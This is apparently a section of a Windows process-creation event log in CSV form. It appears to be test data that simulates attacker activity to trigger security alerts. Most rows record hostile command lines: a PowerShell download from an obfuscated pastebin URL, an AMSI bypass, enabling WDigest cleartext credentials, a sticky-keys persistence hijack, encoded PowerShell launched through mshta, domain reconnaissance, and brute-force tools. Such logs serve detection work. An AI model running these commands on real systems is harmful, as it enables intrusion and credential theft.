+136,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.610,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1500,C:\Windows\System32\win32calc.exe,%%1936,0x14e0,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.610
+137,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.670,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1514,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell  Invoke-ReverseDnsLookup.ps1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.670
+138,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.740,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1534,C:\Windows\System32\win32calc.exe,%%1936,0x1514,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.740
+139,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.847,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x154c,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -command ""(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.847
+140,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.160,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1490,C:\Windows\System32\net.exe,%%1936,0xbc8,net  localgroup Administrators,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.160
+141,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.183,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Windows\System32\net1.exe,%%1936,0x1490,C:\Windows\system32\net1  localgroup Administrators,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.183
+142,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.233,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x142c,C:\Windows\System32\whoami.exe,%%1936,0xbc8,whoami,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.233
+143,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.283,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b0,C:\Windows\System32\HOSTNAME.EXE,%%1936,0xbc8,hostname,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.283
+144,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.317,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14c0,C:\Windows\System32\NETSTAT.EXE,%%1936,0xbc8,netstat  -an,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.317
+145,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.440,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14fc,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user Bob1 /domain,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.440
+146,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.457,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Windows\System32\net1.exe,%%1936,0x14fc,C:\Windows\system32\net1  user Bob1 /domain,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.457
+147,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.483,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user BobX /domain,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.483
+148,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x152c,C:\Windows\System32\net1.exe,%%1936,0x14e8,C:\Windows\system32\net1  user BobX /domain,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.500
+149,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1520,C:\Windows\System32\net.exe,%%1936,0xbc8,"net  group ""Domain Admins"" /domain",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.520
+150,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.533,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1514,C:\Windows\System32\net1.exe,%%1936,0x1520,"C:\Windows\system32\net1  group ""Domain Admins"" /domain",C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.533
+151,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.553,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1550,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rUnDlL32  /C ShEll32Control_RanDLL.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.553
+152,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.570,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1560,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  query add mscfile\\\\open,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.570
+153,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.620,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1584,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  add Image File Execution Options sethc.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.620
+154,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\ftp.exe,%%1936,0xbc8,.\ftp  -s:C:\RECYCLER\xxppyy.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.677
+155,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.727,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15c0,C:\Diagnostics\UserTmp\dubrute.exe,%%1936,0xbc8,.\dubrute.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.727
+156,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.777,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1600,C:\Diagnostics\UserTmp\nlbrute.exe,%%1936,0xbc8,.\nlbrute.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.777
+157,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.827,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15f0,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  add ""HKLM\system\CurrentControlSet\Control\Terminal Server"" /v ""fDenyTSConnections"" /t REG_DWORD /d 0x1 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.827
+158,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.880,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x162c,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  add ""HKLM\system\CurrentControlSet\Control\Terminal Server"" /v ""fDenyTSConnections"" /t REG_DWORD /d 0x0 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.880
+159,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.923,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x166c,C:\Windows\System32\net.exe,%%1936,0xbc8,net  use v: \\tsclient\c,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.923
+160,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.950,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1660,C:\Windows\System32\net.exe,%%1936,0xbc8,net  v: /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.950
+161,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1658,C:\Windows\System32\net1.exe,%%1936,0x1660,C:\Windows\system32\net1  v: /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.967
+162,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.020,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x169c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c C:\Windows\System32\mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run("".\powershell.exe -c """"$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion Certificate).Certificate);.\powershell -E $y"""""",0,True)(window.close)",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.020
+163,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.067,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x168c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,.\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\users\Bob\appdata\Roaming\RbtGskQ\RbtGskQ.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.067
+164,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.117,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16c8,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  add HKLM\KEY_LOCAL_MACHINE\...securityproviders\wdigest uselogoncredential /t 1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.117
+165,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.217,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1560,C:\Windows\System32\conhost.exe,%%1936,0x1550,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\vssadmin.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.217
+166,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.220,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x158c,C:\Windows\System32\cmd.exe,%%1936,0xbc8,c:\Windows\System32\cmd.exe  /c net user,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.220
+167,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.257,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d0,C:\Windows\System32\conhost.exe,%%1936,0x158c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.257
+168,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.363,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15c8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c c:\Diagnostics\UserTmp\scrsave.scr""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.363
+169,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.410,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15ec,C:\Diagnostics\UserTmp\svchost.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\svchost.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.410
+170,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.457,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15e8,C:\Diagnostics\UserTmp\smss.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\smss.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.457
+171,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1630,C:\Windows\System32\svchost.exe,%%1936,0xbc8,c:\Windows\System32\svchost.exe  -k malicious,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.493
+172,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1668,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd.exe  /c echo createobject""msxml2.xmlhttp"") ",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.520
+173,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.570,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1658,C:\Diagnostics\UserTmp\ASC_Alerttest_662jfi039n.exe,%%1936,0xbc8,ASC_Alerttest_662jfi039n.exe  -foo,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.570
+174,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.580,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1664,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.580
+175,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.650,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16d4,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.650
+176,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.080,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16c0,C:\Diagnostics\UserTmp\wuauclt.exe,%%1936,0xbc8,".\wuauclt.exe  /C ""c:\windows\softwaredistribution\cscript.exe""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.080
+177,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.147,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1704,C:\Windows\SoftwareDistribution\cscript.exe,%%1936,0x16c0,c:\windows\softwaredistribution\cscript.exe,C:\Diagnostics\UserTmp\wuauclt.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.147
+178,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.230,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Windows\System32\net1.exe,%%1936,0x1704,C:\Windows\system32\net1,C:\Windows\SoftwareDistribution\cscript.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.230
+179,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11cc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:24.010
+180,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x99c,C:\Windows\System32\conhost.exe,%%1936,0x11cc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:24.027
+181,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:25.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11c4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:25.517
+182,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:26.000
+183,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:49:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xaa8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:49:26.010
+184,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x138c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:24.000
+185,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa60,C:\Windows\System32\conhost.exe,%%1936,0x138c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:24.017
+186,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:25.693,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xab8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:25.693
+187,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:26.010
+188,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:33:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1380,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:33:26.003
+189,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:33:32.463,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x5cc,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:33:32.463
+190,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.287,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16f4,C:\Diagnostics\UserTmp\lsass.exe,%%1936,0xbc8,".\lsass.exe  /C ""c:\windows\softwaredistribution\cscript.exe""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.287
